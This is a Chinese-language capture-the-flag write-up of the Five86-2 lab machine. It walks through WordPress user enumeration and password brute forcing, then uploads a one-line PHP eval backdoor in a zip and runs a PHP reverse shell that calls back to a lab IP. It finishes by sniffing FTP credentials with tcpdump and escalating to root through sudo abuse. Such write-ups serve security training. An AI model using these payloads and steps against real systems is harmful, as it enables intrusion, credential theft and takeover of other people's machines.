nmap 扫描端口
访问 80 口(要改一下 hosts 文件)
是一个 wordpress,wpscan 来扫描一下看看有哪些用户
wpscan --url http://five86-2/ -e u
wpscan --url http://five86-2 -P passwords.txt -U users.txt 来爆破一下用户名和密码
Username: barney, Password: spooky1 Username: stephen, Password: apollo1
选一个登录一下,再 Add New 中新建一个 e-learning
echo "<html>hello</html>" > index.html
echo "<?php @eval ($_POST ['yichen']); ?>" > index.php
zip poc.zip index.html index.php
来生成一个 zip,然后上传,可以看到文件路径,直接访问那个 php 的后门
蚁剑连上,发现执行不了 nc 命令,在蚁剑的终端上也没法切换用户,然后写了个 system 的 php 也没法反弹 shell
找了个别的版本的 shell
代码语言:javascript复制<?php
$ip = '192.168.149.141';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>没有 python2 所以用的 python3
python3 -c "import pty;pty.spawn('/bin/bash')"
切换到 stephen 用户
Username: stephen, Password: apollo1
ps -auxw
-a 显示同一终端下的所有程序
-aux 显示所有包含其他使用者的行程
-w 显示加宽可以显示较多的资讯
可以看到 ftp 是 paul 用户的跑的,ftp 大多数是明文传输,所以可以使用 tcpdump 抓包看一下,stephen 用户是可以运行 tcpdump 的
看一下网卡信息
cat /proc/net/dev
前面 timeout 设置一下时间,到时间就关掉进程
timeout 150 tcpdump -i veth6b4bbb1 -w ftp.pcap
-i 指定网卡
-w 保存为文件而不是标准输出
直接 cat 文件也可以看到,也可以放到 /tmp 目录,下载下来用 wrieshark 查看
得到 ftp 账户:paul:esomepasswford
尝试切换一下,成功
sudo -l 发现一个不用密码的,可以直接切换到 pater 账户的 shell
sudo -u peter service ../../../../../../bin/sh
再次 sudo -l 发现不用密码就可以执行 passwd 来修改密码
sudo passwd root 更改 root 的密码,然后切换到 root 用户就可以啦
